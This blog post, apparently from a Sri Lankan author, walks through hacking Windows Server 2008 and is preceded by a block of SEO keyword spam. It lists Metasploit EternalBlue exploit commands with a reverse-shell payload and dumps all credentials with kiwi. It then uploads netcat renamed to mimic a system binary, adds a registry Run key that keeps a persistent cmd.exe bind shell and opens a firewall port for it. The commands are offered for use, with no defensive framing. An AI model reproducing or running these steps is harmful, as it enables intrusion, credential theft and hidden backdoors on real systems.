Get a terminal #metasploit msf5 > search eternalblue msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > show options msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.43.42 [Your target ip] msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > show options msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.43.244 [Your ip] msf5 exploit(windows/smb/ms17_010_eternalblue) > run After exploit we can execute this To Load cmd.exe meterpreter > shell C:\Windows\system32>whoami C:\Windows\system32>exit To get all Usernames and Passwords meterpreter > meterpreter > load kiwi meterpreter > creds_all Upload netcat to server and rename it a look like system executable meterpreter > upload /usr/share/windows-binaries/nc.exe svchostn.exe meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn -d 'C:\Windows\system32\svchostn.exe -Ldp 7777 -e cmd.exe' meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn View Firewall Rules and apply new rules meterpreter > shell C:\Windows\system32>netsh firewall show opmode C:\Windows\system32> netsh advfirewall firewall add rule name="Service Window" dir=in action=allow protocol=TCP localport=7777 C:\Windows\system32>exit meterpreter > execute -f svchostn.exe -Ldp 7777 -e cmd.exe On New window nc 192.168.43.42 7777 hack windows server 2008 r2 metasploit hack windows server 2008 r2 administrator password hack windows server 2008 r2 remote desktop hack windows server 2008 r2 hack windows server 2008 administrator password hack windows server 2008 kali linux hack windows server 2008 r2 kali linux hack windows server 2008 metasploit cara hack windows server 2008 check windows server 2008 uptime check windows server 2008 version check windows server 2008 32 or 64 bit check windows server 2008 r2 product key check windows server 2008 license status check windows server 2008 r2 version check windows server 2008 product key check windows server 2008 license key check windows server 2008 r2 uptime check windows server 2008 sid how to hack windows server 2008 administrator password remotely how to hack windows server 2008 how to hack windows server 2008 administrator password how to hack windows server 2008 r2 administrator password how to hack windows server 2008 r2 how to hack windows 2008 server with metasploit how to hack into windows server 2008 hacking windows server 2008 password windows 2008 terminal server hack hack windows server 2008 with metasploit hacking windows server 2008 r2 with metasploit
Hi All Today im going to show how to hack Windows Server 2008 with Fresh installation



All you can find thing by looking at following Video




These are the commands 


Find and load Exploit


Get a terminal

#metasploit

msf5 > search eternalblue

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.43.42 [Your target ip]


msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.43.244 [Your ip]
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

After exploit we can execute this 


To Load cmd.exe 
meterpreter > shell

C:\Windows\system32>whoami
C:\Windows\system32>exit


To get all Usernames and Passwords

meterpreter > 
meterpreter > load kiwi
meterpreter > creds_all



Upload netcat to server and rename it a look like system executable


meterpreter > upload /usr/share/windows-binaries/nc.exe svchostn.exe

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn -d 'C:\Windows\system32\svchostn.exe -Ldp 7777 -e cmd.exe'

meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn


View Firewall Rules and apply new rules


meterpreter > shell

C:\Windows\system32>netsh  firewall show opmode

C:\Windows\system32>  
netsh advfirewall firewall add rule name="Service Window" dir=in action=allow protocol=TCP localport=7777

C:\Windows\system32>exit

meterpreter > execute -f svchostn.exe -Ldp 7777 -e cmd.exe



On New window



nc 192.168.43.42 7777





Manusha

Manusha Amal

මගේ තියන අත්දැකීම් මේ බ්ලොග් එක කියවන ඔබට පේනවනේ, ඉතින් ඔයාලට ගැටළුවක් අවොත් මාව Contact කරගන්න පුළුවන්.

Post A Comment:

0 comments:

දිරියක් වෙන්න අදහස් පෙළක් දාන්න